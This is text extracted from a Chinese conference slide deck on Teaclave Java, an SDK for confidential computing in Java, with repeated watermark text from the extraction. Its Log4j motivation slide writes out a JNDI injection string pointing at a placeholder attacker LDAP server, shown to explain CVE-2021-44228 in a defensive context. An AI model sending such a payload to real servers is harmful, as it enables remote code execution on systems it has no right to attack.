林子熠-Java机密计算.pdf

1、昔日王谢堂前燕，飞入寻常百姓家-Teaclave Java，为Java应用带来机密计算能力的SDK框架演讲人：林子熠CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023Core

2、JavaWeek 2023关于我 林子熠 博士 工业界：阿里巴巴JVM团队技术专家，负责GraalVM Java静态编译和静态分析的开发和应用 学术界：CCF系统专委会执行委员，ACM SIGSOFT（ICSE 2023）杰出论文奖获得者 开源社区：GraalVM社区贡献者，Apache Committer，龙蜥社区机密计算SIG maintainer 其他:GraalVM与Java静态编译原理与应用作者CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWee

3、k 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023动机-如何保障Java应用中的密码安全呢?密码以明文保存在内存中，很容易泄漏java.lang.Stringprivate char values反射设置为空加密密码密码应用生命周期解密加密密码密码应用生命周期销毁解密CoreJavaWeek 2023CoreJavaWeek 20

4、23CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023动机-Log4j漏洞示意https:/nvd.nist.gov/vuln/detail/CVE-2021-44228Java Application Se

5、rverlog4j-core-2.14.x.jarInject malicious request:$jndi:ldap:/xx.xx.xx.xx:1389/AttackerAttacking Server(ip:xx.xx.xx.xx:1389)12memoryPrivate Keydecrypting3ClientEncrypt MessagePublic Key45Attacker.class67CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek

6、 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023CoreJavaWeek 2023高等级的安全保障机密计算 三大安全支柱：存储时加密、传输时加密、运行时加密 硬件隔离出安全与非安全环境，仅信任CPU，实现最高安全等级 用于多方安全计算、同态加密、联邦计算、区块链等诸多场景执行环境TEEmemory任意安全敏感型程序REEmemory安全不敏感程序X86:Intel